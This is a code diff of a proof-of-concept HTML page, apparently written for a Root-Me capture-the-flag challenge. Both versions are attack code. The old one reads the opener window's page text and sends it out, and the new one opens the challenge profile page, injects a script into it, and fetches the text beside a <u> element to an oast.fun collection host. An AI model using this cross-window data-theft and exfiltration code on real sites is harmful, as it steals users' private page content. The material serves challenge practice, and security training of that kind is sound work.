--- a/poc.html
+++ b/poc.html
@@ -1,20 +1,19 @@
 <!DOCTYPE html>
-<html lang="en">
-  <head>
-    <title>Opener POC</title>
-  </head>
+<html>
   <body>
-    <h1>Loading...</h1>
+    <h1>PoC - Opener abuse</h1>
     <script>
-      window.onload = function () {
-        try {
-          const secret = window.opener.document.querySelector("u").parentElement.innerText;
-          fetch("https://jrnhteacxragwsxmgdxlwnh0wn3hp1vx0.oast.fun?data=" + encodeURIComponent(secret));
-        } catch (e) {
-          fetch("https://jrnhteacxragwsxmgdxlwnh0wn3hp1vx0.oast.fun?error=" + encodeURIComponent(e.message));
+      const win = window.open("http://challenge01.root-me.org:58003/profile", "_blank");
+      setTimeout(() => {
+        if (win) {
+          win.document.write(`
+            <script>
+              fetch("https://jrnhteacxragwsxmgdxlwnh0wn3hp1vx0.oast.fun?data=" + 
+                encodeURIComponent(document.querySelector('u').parentElement.innerText));
+            <\/script>
+          `);
         }
-      };
-	  fetch("https://jrnhteacxragwsxmgdxlwnh0wn3hp1vx0.oast.fun?opener=" + (window.opener ? "YES" : "NO"));
+      }, 1000); // petite pause pour que la page charge
     </script>
   </body>
 </html>
